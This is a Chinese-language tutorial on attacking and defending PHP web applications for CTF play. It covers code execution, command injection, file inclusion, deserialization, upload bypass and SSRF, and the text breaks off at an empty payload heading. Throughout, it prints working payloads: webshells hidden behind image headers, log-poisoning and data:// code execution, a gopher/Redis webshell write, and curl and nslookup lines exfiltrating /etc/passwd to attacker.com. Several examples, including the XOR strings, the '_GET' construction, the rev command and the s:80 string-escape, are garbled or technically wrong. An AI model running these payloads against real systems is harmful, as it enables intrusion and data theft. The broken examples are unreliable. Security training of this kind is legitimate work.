WEB攻防-PHP漏洞解析

Web攻防之PHP漏洞解析

目錄結構

引言

     1.1 PHP在CTF Web方向的核心地位1.2 報告目標與結構說明1.3 PHP安全研究的方法論

代碼執行漏洞

      2.1 漏洞原理與歷史演進2.2 危險函數全解析與利用鏈2.3 繞過過濾的20種高級技巧2.4 實戰案例：從CVE到CTF賽題復現2.5 防御方案與安全編碼規范

命令注入漏洞

      3.1 操作系統差異與利用場景3.2 命令分隔符的深度利用3.3 繞過黑名單的終極指南3.4 自動化工具與手工測試結合策略3.5 防御：從輸入過濾到沙箱隔離

文件包含漏洞（LFI/RFI）

      4.1 LFI與RFI的利用場景對比4.2 偽協議的30種高級利用姿勢4.3 日志污染、環境變量與PHP Stream攻擊4.4 防御配置：open_basedir與WAF規則4.5 真實案例：Apache日志注入實戰

反序列化漏洞

      5.1 反序列化漏洞的底層原理5.2 POP鏈構造方法論與工具鏈5.3 Phar協議的高級利用：從元數據到RCE5.4 框架漏洞復現：ThinkPHP、Laravel案例分析5.5 防御：簽名校驗與敏感函數監控

變量覆蓋與弱類型安全

      6.1 extract()與parse_str()的災難性影響6.2 動態變量（$$）的利用與防御6.3 松散比較（==）的100種陷阱場景6.4 哈希碰撞與科學計數法繞過6.5 防御：嚴格類型與白名單校驗

文件上傳與解析漏洞

      7.1 繞過黑名單的15種技術組合7.2 .htaccess與.user.ini的利用原理7.3 短標簽、圖片頭與內容嗅探繞過7.4 服務器解析漏洞全解析（Nginx/Apache/IIS）7.5 防御：文件簽名校驗與權限隔離

偽協議與SSRF聯動攻擊

      8.1 PHP偽協議全家族解析8.2 SSRF攻擊鏈：從端口掃描到內網滲透8.3 Gopher協議構造Redis未授權訪問8.4 防御：協議白名單與請求限制

字符串逃逸與序列化篡改

      9.1 序列化格式的語法與漏洞點9.2 字符數差異引發的屬性覆蓋9.3 利用場景：修改密碼與提權操作9.4 防御：嚴格校驗與加密簽名

會話管理與條件競爭

      10.1 Session Fixation攻擊全流程10.2 Session劫持與預測算法破解10.3 文件上傳競爭：臨時文件RCE10.4 防御：會話綁定與原子操作

無字母數字Webshell技術

     11.1 異或、取反、自增構造原理11.2 利用PHP特性生成任意函數11.3 現代WAF繞過思路與工具11.4 防御：語法分析與行為監控

PHP配置與版本差異

      12.1 PHP4到PHP8的安全演進史12.2 php.ini的50個高危選項解析12.3 版本差異漏洞：從register_globals到JIT12.4 防御：最小化配置與版本升級策略

CTF實戰案例分析

      13.1 十大經典PHP題型復現與解題思路13.2 近年賽題趨勢：從單一漏洞到多鏈組合13.3 真實環境模擬：Docker漏洞靶場搭建

防御體系構建

     14.1 安全開發生命周期（SDLC）實踐14.2 靜態代碼分析與動態Fuzzing結合14.3 RASP與WAF的協同防御14.4 漏洞響應與應急處理流程

1. 引言

1.1 PHP在CTF Web方向的核心地位

1.1.1 PHP的歷史與安全問題的根源

PHP作為Web開發的基石語言，其設計初衷是快速開發，但早期的靈活性也帶來了安全隱患。以下特性使其成為CTF中的“漏洞金礦”：

動態類型系統：松散的類型比較（如"0e123" == 0）導致邏輯漏洞。
危險函數開放性：eval()、system()等函數直接暴露系統調用能力。
全局變量注冊機制（PHP <5.4）：register_globals=On時，GET/POST參數直接注冊為全局變量。

數據佐證：

根據CTFtime統計，2020-2023年全球Top 50 CTF賽事中，63%的Web題目涉及PHP漏洞利用。
CVE數據庫顯示，近5年22%的Web相關CVE漏洞與PHP語言特性直接相關。

1.1.2 PHP在CTF中的典型應用場景

漏洞類型	常見題型	高頻函數/協議
代碼執行	動態代碼執行、沙盒逃逸	`eval()`, `assert()`
反序列化	POP鏈構造、Phar利用	`unserialize()`, `phar://`
文件包含	本地/遠程文件包含、日志污染	`include()`, `php://filter`
弱類型漏洞	哈希碰撞、科學計數法繞過	`==`, `switch`

1.2 報告目標與結構說明

1.2.1 目標分解

技術深度：從PHP解釋器層面解析漏洞成因（如Zend引擎對eval的處理邏輯）。
實戰覆蓋：提供30+ CTF賽題復現步驟及5個CVE漏洞利用鏈分析。
防御體系化：覆蓋代碼層、配置層、架構層的完整防護方案。

1.2.2 結構設計

本報告采用**“漏洞原理-繞過技巧-實戰案例-防御方案”四維分析法**，每章節包含：

底層機制：結合PHP內核代碼（如zend_execute.c）解析漏洞觸發點。
繞過方法論：提供繞過黑名單、過濾規則的技術組合。
CTF/CVE復現：分步驟拆解漏洞利用過程，附完整Payload。
防御實踐：提供可落地的代碼修復方案與配置指南。

1.3 PHP安全研究的方法論

1.3.1 黑盒測試技術棧

模糊測試（Fuzzing）：
- 工具鏈：ffuf、Burp Intruder、wfuzz。
- Payload庫：使用SecLists中的PHP-Common-Fuzz.txt覆蓋常見注入點。
```
# 使用ffuf進行路徑探測  
ffuf -w /path/to/wordlist -u http://target.com/FUZZ -mc 200  
```
協議探測：
- 偽協議檢測：測試php://input、data://、phar://是否啟用。
- 示例Payload：
```
?file=php://filter/convert.base64-encode/resource=index.php  
```

1.3.2 白盒審計方法論

危險函數追蹤：
- 關鍵詞列表：eval、system、unserialize、extract、preg_replace+/e。
- 代碼審計工具：RIPS、SonarQube PHP插件。
數據流分析：
- 用戶輸入源：追蹤$_GET、$_POST、$_COOKIE到危險函數的傳遞路徑。
- 示例代碼片段：
```
$input = $_GET['data'];  
// 未過濾直接傳遞到危險函數  
eval($input);  
```

1.3.3 版本差異利用策略

PHP版本特性矩陣：

版本范圍	關鍵安全特性	典型漏洞場景
PHP <5.3	`register_globals=On`默認啟用	全局變量覆蓋（CVE-2008-3660）
PHP 5.4-5.6	`preg_replace+/e`未禁用	代碼執行（CTF高頻考點）
PHP 7.0+	`assert()`不再執行代碼	需改用其他函數觸發漏洞

2. 代碼執行漏洞

2.1 漏洞原理與歷史演進

2.1.1 動態執行機制解析

eval()函數原理：
PHP的eval()直接將字符串作為PHP代碼執行，其底層調用zend_eval_string()函數。

// PHP內核源碼（zend_execute.c）  
ZEND_API int zend_eval_string(char *str, zval *retval_ptr, char *string_name) {  // 代碼解析與執行  
}

assert()的演變：
- PHP <7.1：assert()可執行代碼，如assert("system('id')")。
- PHP >=7.1：assert()僅進行布爾判斷，不再執行代碼。

2.一，2 歷史漏洞案例

CVE-2012-1823（PHP-CGI參數注入）：

漏洞成因：PHP-CGI未正確處理-d參數，導致配置覆蓋。

利用Payload：

http://target.com/index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input  
POST DATA: <?php system("id"); ?>

CVE-2019-11043（PHP-FPM RCE）：
- 漏洞觸發：Nginx配置錯誤導致PHP-FPM緩沖區溢出。
- 利用工具：exploit.py（自動構造惡意FastCGI請求）。

2.2 危險函數全解析與利用鏈

2.2.1 直接執行類函數

函數	觸發條件	示例代碼	漏洞版本
`eval()`	任意字符串輸入	`eval($_GET['code']);`	全版本
`assert()`	PHP<7.1且參數為字符串	`assert("system('id')");`	PHP <7.1
`preg_replace+/e`	使用`/e`修飾符	`preg_replace('/.*/e', 'system("id")', '');`	PHP <5.5

2.2.2 回調函數鏈利用

array_map()漏洞：

// 用戶控制回調函數名  
array_map($_GET['func'], [$_GET['arg']]);  
// 攻擊Payload：?func=system&arg=id

usort()注入：

// 通過自定義比較函數執行代碼  
usort($array, $_GET['cmp']);  
// 攻擊Payload：?cmp=system&0=id

2.3 繞過過濾的20種高級技巧

2.3.1 字符串混淆技術

Hex編碼繞過：

eval(hex2bin("73797374656d2822696422293b")); // system("id");

Base64編碼：

eval(base64_decode("c3lzdGVtKCJpZCk7"));    // system("id");

異或運算生成字符：

$a = ("!" ^ "@").("@" ^ "A"); // 生成"ph"  
$b = ("#" ^ "$").("$" ^ "%"); // 生成"p"  
($a.$b)(); // 調用phpinfo()

2.3.2 動態函數名構造

可變變量覆蓋：

${"_GET"} = "system";  
$_GET[0]($_GET[1]); // 調用system("id")

超全局數組利用：

// 通過超全局數組繞過關鍵詞過濾  
$func = $_POST['a'][0];  
$func($_POST['a'][1]);

2.3.3 語法特性濫用

短標簽繞過：

<?= `$_GET['cmd']`?>    // 等效于<?php echo `$_GET['cmd']`; ?>

反引號執行命令：

echo `id`;  // 直接執行系統命令

2.4 實戰案例：從CVE到CTF賽題復現

案例1：HITCON CTF 2018（無字母RCE）

題目代碼：

$cmd = $_POST['cmd'];  
if (!preg_match('/[a-z]/i', $cmd)) {  eval($cmd);  
}

繞過步驟：
1. 利用超全局數組：
  PHP中_GET、_POST等變量以十六進制存儲，可通過異或生成：
```
$_ = ~(%9A%9B%9C%9D); // 生成"_GET"  
$$_[0]($$_[1]);       // 調用system("id")  
```
2. 構造無字母Payload：
```
cmd=$_=~%9A%9B%9C%9D;$_();  
```

案例2：CVE-2019-11043（PHP-FPM RCE）

環境搭建：
- 配置Nginx錯誤路徑解析（如fastcgi_split_path_info ^(.+?\.php)(/.*)$;）。
利用步驟：
- 使用exploit.py發送惡意FastCGI請求，注入PHP_VALUE修改配置。
- 通過auto_prepend_file=php://input包含攻擊代碼。

結果驗證：

curl http://target.com/index.php -d "<?php system('id'); ?>"

2.5 防御方案與安全編碼規范

2.5.1 代碼層防護

禁用危險函數：

; php.ini配置  
disable_functions = eval,assert,system,passthru

輸入白名單過濾：

$allowed_commands = ['ls', 'cat'];  
if (in_array($_GET['cmd'], $allowed_commands)) {  system($_GET['cmd']);  
}

2.5.2 架構層加固

啟用Suhosin擴展：

; 過濾動態函數調用  
suhosin.executor.disable_eval = On  
suhosin.executor.disable_emodifier = On

部署WAF規則：攔截eval、system等關鍵詞。

2.5.3 安全開發規范

避免動態執行：用switch-case替代回調函數。

強制類型轉換：

$id = (int)$_GET['id'];  // 防止SQL注入

使用安全函數替代：

// 使用escapeshellarg()轉義參數  
system('ls ' . escapeshellarg($_GET['dir']));

本節總結
代碼執行漏洞是CTF Web方向的“核彈級”漏洞，需深入理解PHP內核機制與繞過技巧。防御需從代碼、配置、架構多維度構建縱深防護體系。

3. 命令注入漏洞

3.1 操作系統差異與利用場景

3.1.1 Linux與Windows命令執行的本質差異

Linux Shell特性：
- 管道符：|、||、&&、;
- 重定向：>、<、>>
- 環境變量：$PATH、$IFS（內部字段分隔符）
- 通配符：*、?、[]
Windows CMD特性：
- 命令分隔符：&、|、%0a（換行符）
- 特殊符號：^（轉義符）、%COMSPEC%（系統環境變量）
- 路徑處理：空格路徑需用雙引號包裹（如C:\Program Files\）

3.1.2 多平臺利用策略對比

場景	Linux Payload	Windows Payload
執行多條命令	`id; ls /`	`ipconfig & dir C:\`
條件執行	`cat /etc/passwd && whoami`	`type NUL && net user`
錯誤屏蔽	`cat /etc/shadow 2>/dev/null`	`dir C:\notexist 2>nul`

3.1.3 實戰案例：跨平臺Payload構造

目標未知時的兼容寫法：
```
ping -c 1 127.0.0.1; ping -n 1 127.0.0.1
```
（Linux用-c，Windows用-n）

3.2 命令分隔符的深度利用

3.2.1 Linux分隔符利用矩陣

分隔符	作用	示例	備注
`;`	順序執行	`id; cat /etc/passwd`	無論前一命令是否成功，都會執行下一命令
`&&`	前命令成功則執行后命令	`ls /tmp/flag && cat /tmp/flag`	僅在前一個命令成功時執行后一個命令
`		`	前命令失敗則執行后命令
`$()`	子命令執行并替換輸出	`echo $(whoami)`	將子命令的輸出作為參數傳遞給外部命令
`	`	管道符（傳遞前命令輸出）	`cat /etc/passwd

3.2.2 Windows分隔符繞過技巧

符號轉義：

^|   → 轉義為管道符
^&   → 轉義為&

利用變量拼接：

set cmd=net user
%cmd%   → 執行net user

3.2.3 盲注場景下的分隔符利用

時間盲注：

ping -c 5 127.0.0.1; if [ $(whoami) = "root" ]; then sleep 10; fi

錯誤回顯盲注：
```
cat /etc/passwd || echo "Not root"
```

3.3 繞過黑名單的終極指南

3.3.1 關鍵詞繞過技術

過濾項	繞過方式	示例
空格	`%09`（Tab）、`${IFS}`、`<`	`cat%09/etc/passwd`
斜杠	雙斜杠、反斜杠	`cat /etc//passwd`
命令關鍵詞	通配符、轉義符	`c\at /etc/passwd`、`cat /???/pass*`
長度限制	環境變量拼接	`a=cat;b=/etc/passwd;$a $b`

3.3.2 編碼與混淆技術

Base64編碼：

echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bash  # 解碼執行"cat /etc/passwd"

Hex編碼：

echo "636174202f6574632f706173737764" | xxd -r -p | bash  # 同上

逆序命令：

echo 'dcu/' | rev | xargs ls  # 實際執行ls /cwd

3.3.3 無回顯下的外帶數據

DNS外帶：
```
nslookup $(whoami).attacker.com
```

HTTP請求：

curl http://attacker.com/?data=$(cat /etc/passwd | base64)

3.4 自動化工具與手工測試結合策略

3.4.1 工具鏈推薦

Commix：自動化命令注入利用框架

commix -u "http://target.com/?ip=127.0.0.1" --os-cmd="id"

Burp Suite Intruder：測試分隔符與編碼組合

3.4.2 手工測試流程

探測過濾規則：
- 輸入; $() &等符號，觀察是否被攔截
測試編碼繞過：
- 嘗試Base64、Hex、URL編碼
驗證命令執行：
- 使用時間延遲命令（如sleep 5）確認漏洞存在

3.5 防御：從輸入過濾到沙箱隔離

3.5.1 輸入過濾規范

白名單校驗：

$allowed_chars = '/^[a-zA-Z0-9.-]+$/';
if (!preg_match($allowed_chars, $_GET['ip'])) {die('非法輸入');
}

參數化調用：

$cmd = escapeshellarg($_GET['dir']);
system("ls " . $cmd);

3.5.2 沙箱隔離方案

Docker容器化：限制命令執行權限

FROM alpine
RUN adduser -D restricted_user
USER restricted_user

Seccomp策略：禁用危險系統調用

{"defaultAction": "SCMP_ACT_ALLOW","syscalls": [{ "names": ["execve"], "action": "SCMP_ACT_ERRNO" }]
}

4. 文件包含漏洞（LFI/RFI）

4.1 LFI與RFI的利用場景對比

4.1.1 利用條件矩陣

類型	描述	必要條件
LFI	包含本地文件	路徑可控
RFI	包含遠程URL	`allow_url_include=On`

4.1.2 典型攻擊目標

LFI目標：
- /etc/passwd（用戶列表）
- 應用源碼（index.php）
- 日志文件（/var/log/apache2/access.log）
RFI目標：
- 遠程Web服務器上的惡意腳本
- SMB共享文件（\\attacker.com\shell.php）

4.2 偽協議的30種高級利用姿勢

4.2.1 php://filter的變形利用

讀取源碼：

?file=php://filter/convert.base64-encode/resource=index.php

繞過死亡Exit：

php://filter/string.rot13/resource=php://filter/convert.base64-encode/resource=index.php

（通過多次編碼破壞原始PHP結構）

4.2.2 data://協議執行代碼

直接包含代碼：

?file=data://text/plain,<?php system("id");?>

Base64編碼繞過過濾：

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpOz8+

4.2.3 phar://反序列化攻擊

生成惡意Phar文件：

class Exploit { function __destruct() { system("id"); } }
$phar = new Phar("exploit.phar");
$phar->setMetadata(new Exploit());

觸發反序列化：
```
?file=phar://exploit.phar
```

4.3 日志污染、環境變量與PHP Stream攻擊

4.3.1 日志污染利用步驟

污染User-Agent：

GET / HTTP/1.1
User-Agent: <?php system($_GET['c']); ?>

包含日志文件：

?file=../../var/log/apache2/access.log&c=id

4.3.2 環境變量注入

通過/proc/self/environ：
```
?file=/proc/self/environ
```
（需環境變量中存在可控參數）

4.3.3 PHP Stream包裝器攻擊

expect://執行命令（需安裝擴展）：
```
?file=expect://id
```

4.4 防御配置：open_basedir與WAF規則

4.4.1 PHP層防御

open_basedir限制：
```
open_basedir = /var/www/html
```

禁用危險協議：

allow_url_include = Off
allow_url_fopen = Off

4.4.2 WAF規則示例（ModSecurity）

SecRule ARGS_GET "@contains ../" "id:1001,deny,msg:'Path Traversal Attempt'"
SecRule ARGS_GET "@contains php://filter" "id:1002,deny,msg:'PHP Filter Abuse'"

4.5 真實案例：Apache日志注入實戰

攻擊步驟

發送惡意請求：

curl -H "User-Agent: <?php system(\$_GET['c']); ?>" http://target.com/

計算日志路徑：
- 默認路徑：/var/log/apache2/access.log
- 通過報錯信息確認實際路徑

觸發文件包含：

http://target.com/?file=../../var/log/apache2/access.log&c=id

防御加固

日志文件權限：

chmod 640 /var/log/apache2/access.log
chown root:adm /var/log/apache2/*

日志內容過濾：

LogFormat "%h %t \"%r\" %>s" common
CustomLog /var/log/apache2/access.log common

（移除User-Agent記錄）

本章總結
命令注入與文件包含漏洞是CTF Web方向的“黃金組合”。攻擊者需靈活運用操作系統特性、協議混淆及日志污染技術，防御方則需構建從輸入過濾到環境隔離的多層防線。掌握這些技術不僅能破解賽題，更能提升企業級Web應用的安全水位。

5. 反序列化漏洞

5.1 反序列化漏洞的底層原理

5.1.1 PHP序列化與反序列化機制

序列化（serialize）：
將PHP對象轉換為字符串，包含類名、屬性及數據類型。

class User { public $name = "Alice"; }  
echo serialize(new User());  
// 輸出：O:4:"User":1:{s:4:"name";s:5:"Alice";}

反序列化（unserialize）：
將字符串還原為對象，觸發魔術方法（如__wakeup, __destruct）。

5.1.2 漏洞觸發點

可控輸入：用戶輸入直接傳入unserialize()。

$data = $_GET['data'];  
unserialize($data);

魔術方法中的危險操作：

class Exploit {  function __destruct() {  system($this->cmd);  // 反序列化時觸發命令執行  }  
}

5.1.3 PHP內核源碼分析

反序列化入口：php_var_unserialize函數（ext/standard/var_unserialize.c）

PHPAPI int php_var_unserialize(  zval *rval, const unsigned char **p,  const unsigned char *max, php_unserialize_data_t *var_hash  
) {  // 解析序列化字符串并重建對象  
}

5.2 POP鏈構造方法論與工具鏈

5.2.1 POP（Property-Oriented Programming）鏈原理

通過串聯多個類的魔術方法，形成從入口點到危險函數的調用鏈。

5.2.2 構造步驟

尋找起點：包含__wakeup、__destruct等魔術方法的類。
連接方法調用：通過對象屬性控制調用鏈。
觸發最終操作：執行文件操作、命令執行等。

5.2.3 工具鏈

PHPGGC：自動化生成反序列化Payload（支持主流框架）

./phpggc -l  # 查看支持的框架  
./phpggc ThinkPHP/RCE1 system "id" -p phar -o payload.phar

RIPS：靜態代碼分析工具，識別危險調用鏈。

5.2.4 實戰案例：Joomla RCE（CVE-2015-8562）

漏洞類：JDatabaseDriverMysqli

POP鏈構造：

$obj->disconnectHandlers = [惡意回調];  
$obj->connection = 可控對象;

觸發點：反序列化時觸發__destruct執行任意回調。

5.3 Phar協議的高級利用：從元數據到RCE

5.3.1 Phar文件結構

部分	描述
Stub	文件頭標識（如`<?php __HALT_COMPILER(); ?>`）
Manifest	元數據（含序列化信息）
File Contents	文件內容
Signature	可選簽名

5.3.2 利用流程

生成惡意Phar：

class Exploit { function __destruct() { system("id"); } }  
$phar = new Phar("exploit.phar");  
$phar->setMetadata(new Exploit());

觸發反序列化：

file_exists('phar://exploit.phar');  // 觸發元數據解析

5.3.3 繞過限制技巧

文件頭偽裝：添加GIF89a頭繞過上傳檢測。

協議組合利用：

include('phar:///tmp/exploit.gif');  // 即使擴展名為.gif也可觸發

5.4 框架漏洞復現：ThinkPHP、Laravel案例分析

5.4.1 ThinkPHP 5.x 反序列化RCE

漏洞類：think\process\pipes\Windows

利用鏈：

__destruct() → removeFiles() → file_exists() → Phar反序列化

Payload生成：

phpggc ThinkPHP/RCE1 system "id" -p phar -o payload.phar

5.4.2 Laravel RCE（CVE-2021-3129）

漏洞點：Ignition組件的debug模式
利用步驟：
1. 生成Phar文件寫入日志
2. 通過file_get_contents觸發反序列化
修復方案：升級Ignition至2.5.1+

5.5 防御：簽名校驗與敏感函數監控

5.5.1 代碼層防御

禁用反序列化：
```
disable_functions = unserialize  
```

白名單校驗：

$allowed_classes = ['SafeClass'];  
unserialize($data, ['allowed_classes' => $allowed_classes]);

5.5.2 監控方案

Suhosin擴展：攔截危險魔術方法
```
suhosin.executor.disable_eval = On  
```
OpenRASP：實時檢測反序列化攻擊鏈

6. 變量覆蓋與弱類型安全

6.1 extract()與parse_str()的災難性影響

6.1.1 extract()變量覆蓋

extract($_GET);  // 將GET參數轉為變量  
if ($is_admin) {  // 攻擊者可傳入?is_admin=1提權  
}

6.1.2 parse_str()漏洞

parse_str(file_get_contents('config.ini'));  
// 攻擊者可覆蓋$db_password等配置參數

6.1.3 歷史漏洞案例

WordPress插件漏洞：通過extract()覆蓋權限校驗變量，實現未授權訪問。

6.2 動態變量（$$）的利用與防御

6.2.1 漏洞代碼示例

foreach ($_GET as $key => $value) {  $$key = $value; // 用戶可控制任意變量名  
}  
// 攻擊者傳入?_CONFIG[security]=0

6.2.2 防御方案

白名單過濾：

$allowed = ['page', 'sort'];  
foreach ($_GET as $key => $value) {  if (in_array($key, $allowed)) {  $$key = $value;  }  
}

6.3 松散比較（==）的100種陷阱場景

6.3.1 類型轉換規則

比較示例	結果	原因
`"0e1234" == "0"`	true	科學計數法轉為0
`"123abc" == 123`	true	字符串轉為整數
`array() == false`	true	空數組視為false

6.3.2 CTF題型：哈希碰撞繞過

if ($_GET['a'] != $_GET['b'] && md5($_GET['a']) == md5($_GET['b'])) {  echo "Flag: ...";  
}  
// 提交a=240610708&b=QNKCDZO（MD5均為0e...）

6.4 哈希碰撞與科學計數法繞過

6.4.1 哈希碰撞利用

Magic Hashes列表：

哈希值（MD5）原始字符串
0e462097431906 240610708
0e830400451993 QNKCDZO

哈希值（MD5）	原始字符串
0e462097431906	240610708
0e830400451993	QNKCDZO

6.4.2 科學計數法攻擊

if ($_POST['hash'] == md5($secret)) {  // 假設$secret的MD5以0e開頭  // 提交hash=0e123456...  
}

6.5 防御：嚴格類型與白名單校驗

6.5.1 嚴格類型檢查

if ($_GET['role'] === 'admin') {  // 使用===替代==  // 執行特權操作  
}

6.5.2 白名單校驗

$allowed_actions = ['view', 'edit'];  
$action = $_GET['action'];  
if (!in_array($action, $allowed_actions)) {  die('非法操作');  
}

附錄：工具與資源

反序列化漏洞檢測工具

PHPStan：靜態代碼分析工具，識別unserialize()調用
phpggc：一鍵生成主流框架Payload

弱類型安全測試Payload

科學計數法：0e123, 0e-456  
類型混淆："0", "123abc", array()

7. 文件上傳與解析漏洞

7.1 繞過黑名單的15種技術組合

1. 擴展名混淆

大小寫混合：.pHp、.pHP5（Windows不區分大小寫）。
雙擴展名：shell.php.jpg（部分服務器解析最后一個擴展名）。
空字節截斷：shell.php%00.jpg（PHP <5.3.4 允許%00截斷）。
超長后綴：shell.php.xxxxxxxx（某些WAF僅檢查前幾個字符）。
特殊字符繞過：.php::$DATA（Windows NTFS流特性）。

2. 內容混淆

添加圖片頭：
```
GIF89a; <?php system($_GET['c']); ?>
```

HTML內嵌PHP：

<script language="php">system("id");</script>

短標簽繞過：

<?= `$_GET['cmd']` ?>  <!-- 等價于<?php echo `$_GET['cmd']`; ?> -->

3. 協議與編碼混淆

Phar偽協議觸發反序列化：
上傳惡意Phar文件，通過phar://觸發反序列化。

Base64編碼內容：

<?php eval(base64_decode("c3lzdGVtKCJpZCIpOw==")); // 解碼后：system("id");

4. 服務器特性利用

Apache多后綴解析：
shell.php.xxx 可能被解析為PHP（依賴AddHandler配置）。
IIS分號截斷：
shell.asp;.jpg 被IIS解析為ASP文件。
Nginx路徑解析錯誤：
/uploads/shell.jpg/xxx.php 可能將shell.jpg當作PHP解析。

7.2 .htaccess與.user.ini的利用原理

1. .htaccess攻擊

覆蓋解析規則：
上傳包含以下內容的.htaccess文件：

AddType application/x-httpd-php .jpg  # 所有.jpg文件作為PHP解析

啟用PHP執行：
```
SetHandler application/x-httpd-php
```

2. .user.ini攻擊

自動包含惡意文件：
上傳包含以下內容的.user.ini：

auto_prepend_file = shell.jpg  # 每次訪問PHP文件前包含shell.jpg

利用條件：
- PHP運行在CGI模式。
- 服務器允許.user.ini覆蓋配置。

3. 防御措施

禁用.htaccess：
Apache配置中設置 AllowOverride None。
限制.user.ini：
設置open_basedir限制目錄訪問。

7.3 短標簽、圖片頭與內容嗅探繞過

1. 短標簽利用

短標簽語法：

<?= system("id") ?>  <!-- 等效于 <?php echo system("id"); ?> -->

繞過關鍵詞檢測：
避免使用<?php，降低被正則匹配的概率。

2. 圖片頭偽造

GIF頭混淆：
```
GIF89a
<?php system($_GET['c']); ?>
```
PNG頭混淆：
```
\x89PNG\x0D\x0A\x1A\x0A<?php ... ?>
```

3. 內容嗅探繞過

修改MIME類型：
上傳時指定Content-Type: image/png。
文件內容填充：
在惡意代碼后添加大量垃圾數據，繞過內容檢測。

7.4 服務器解析漏洞全解析（Nginx/Apache/IIS）

1. Nginx解析漏洞

路徑解析錯誤：
若配置fastcgi_split_path_info錯誤，/test.jpg/xxx.php會將test.jpg作為PHP解析。
修復方案：
檢查Nginx配置，避免使用錯誤的正則分割路徑。

2. Apache解析漏洞

多后綴解析：
文件shell.php.xxx可能被解析為PHP（需配置AddHandler）。
修復方案：
明確配置AddHandler，避免模糊后綴。

3. IIS解析漏洞

分號截斷：
shell.asp;.jpg被解析為ASP文件。
修復方案：
禁用不必要的腳本映射，如.asp、.asa。

7.5 防御：文件簽名校驗與權限隔離

1. 文件簽名校驗

檢測文件頭：

$file_header = bin2hex(file_get_contents($_FILES['file']['tmp_name'], 0, 4));
if ($file_header !== '89504e47') { // PNG頭校驗die("非PNG文件");
}

使用finfo_file檢測MIME：

$mime = finfo_file(finfo_open(FILEINFO_MIME_TYPE), $_FILES['file']['tmp_name']);
if ($mime !== 'image/png') {die("文件類型非法");
}

2. 權限隔離

上傳目錄不可執行：

chmod -R 755 uploads/
chown www-data:www-data uploads/

文件重命名存儲：

$new_name = md5(uniqid()) . '.jpg';
move_uploaded_file($_FILES['file']['tmp_name'], $new_name);

8. 偽協議與SSRF聯動攻擊

8.1 PHP偽協議全家族解析

1. 常用偽協議

協議	作用	示例
`php://input`	讀取POST原始數據	`file_get_contents('php://input')`
`php://filter`	過濾或編碼文件內容	`php://filter/convert.base64-encode/resource=index.php`
`data://`	直接包含代碼或數據	`data://text/plain,<?php system("id");?>`
`phar://`	觸發反序列化或繞過擴展名限制	`phar://uploads/exploit.phar`
`expect://`	執行系統命令（需安裝擴展）	`expect://id`

2. 協議利用場景

讀取源碼：

include('php://filter/convert.base64-encode/resource=index.php');

執行代碼：

include('data://text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpOw==');

8.2 SSRF攻擊鏈：從端口掃描到內網滲透

1. 端口掃描

探測內網服務：

$urls = ['http://127.0.0.1:3306', // MySQL'http://127.0.0.1:6379', // Redis
];
foreach ($urls as $url) {if (@file_get_contents($url)) {echo "Port open: $url\n";}
}

2. 內網服務攻擊

訪問管理接口：

file_get_contents('http://192.168.1.1/admin/delete_all.php');

3. 協議擴展攻擊

利用dict://探測Redis：

http://target.com/ssrf.php?url=dict://127.0.0.1:6379/info

8.3 Gopher協議構造Redis未授權訪問

1. 攻擊步驟

生成Redis命令Payload：

(echo -e "SET x '<?php system(\$_GET['c']); ?>'\nCONFIG SET dir /var/www/html\nSAVE\n"; sleep 1) | nc redis-server 6379

將命令轉換為Gopher格式：

# 使用工具如gopherus生成Payload
payload = "gopher://127.0.0.1:6379/_" + urlencode(redis_command)

觸發SSRF：

file_get_contents($_GET['url']); // url=生成的Gopher Payload

2. 結果驗證

訪問http://target.com/x.php?c=id執行命令。

8.4 防御：協議白名單與請求限制

1. 協議白名單

禁用危險協議：

; php.ini配置
allow_url_fopen = Off
allow_url_include = Off

2. 請求限制

過濾內網地址：

$url = $_GET['url'];
if (preg_match('/^(127\.|192\.168|10\.)/', $url)) {die("禁止訪問內網");
}

使用CSP策略：

Content-Security-Policy: default-src 'self';

3. 網絡層防御

防火墻規則：
限制服務器對外請求，僅允許訪問必要的外網服務。
服務隔離：
將關鍵內網服務部署在獨立VPC，禁止公網訪問。

總結

文件上傳與SSRF漏洞是CTF和真實滲透中的高頻考點。攻擊者通過擴展名混淆、內容偽裝、偽協議組合實現代碼執行或內網穿透，而防御需從文件校驗、權限隔離、協議限制等多維度構建防線。掌握這些技術不僅能破解復雜題目，更能提升企業應用的安全性。

9. 字符串逃逸與序列化篡改

9.1 序列化格式的語法與漏洞點

序列化基礎語法

PHP序列化字符串的格式如下：

基本類型：
- 字符串：s:長度:"內容";（如 s:5:"Hello";）
- 整型：i:值;（如 i:123;）
- 布爾型：b:值;（如 b:1;）
復合類型：
- 數組：a:元素數量:{鍵值對}（如 a:2:{i:0;s:3:"red";i:1;s:5:"green";}）
- 對象：O:類名長度:"類名":屬性數量:{屬性定義}
```
// 示例對象序列化
class User { public $name = "Alice"; }
serialize(new User()); // 輸出：O:4:"User":1:{s:4:"name";s:5:"Alice";}
```

漏洞觸發點

未校驗反序列化數據：用戶可控的序列化字符串直接傳入unserialize()。
字符數差異：序列化字符串中聲明的長度與實際值不匹配，導致后續屬性被覆蓋。

9.2 字符數差異引發的屬性覆蓋

攻擊原理

通過構造錯誤的字符長度，使反序列化解析器錯誤地“吞并”后續字符，覆蓋關鍵屬性。

示例代碼與攻擊

class User {public $username;public $is_admin = 0; // 默認非管理員
}// 正常序列化數據
$data = 'O:4:"User":2:{s:8:"username";s:5:"Alice";s:7:"is_admin";i:0;}';// 攻擊者篡改后的數據
$malicious_data = 'O:4:"User":2:{s:8:"username";s:80:"Alice";s:7:"is_admin";i:1;}'; 
// 實際username值的長度聲明為80，但實際內容只有5字節，后續字符被解析為is_admin的值$user = unserialize($malicious_data);
echo $user->is_admin; // 輸出1，權限被提升

關鍵點分析

字符數溢出：s:80:"Alice" 聲明長度為80，但實際只有5字節，導致后續的 ";s:7:"is_admin";i:1;} 被解析為新屬性。
結果：is_admin 被覆蓋為1，實現提權。

9.3 利用場景：修改密碼與提權操作

場景1：密碼重置漏洞

漏洞代碼：

class ResetRequest {public $token;public $new_password;
}$data = $_POST['data'];
$request = unserialize($data);
if ($request->token === $valid_token) {update_password($request->new_password);
}

攻擊Payload：

// 構造惡意序列化數據，覆蓋$token為已知值
$payload = 'O:12:"ResetRequest":2:{s:5:"token";s:10:"KNOWN_TOKEN";s:11:"new_password";s:8:"hacked123";}';

場景2：用戶權限提升

漏洞代碼：

class Session {public $user_id;public $role = "user";
}$session = unserialize($_COOKIE['session']);
if ($session->role === "admin") {grant_admin_access();
}

攻擊Payload：

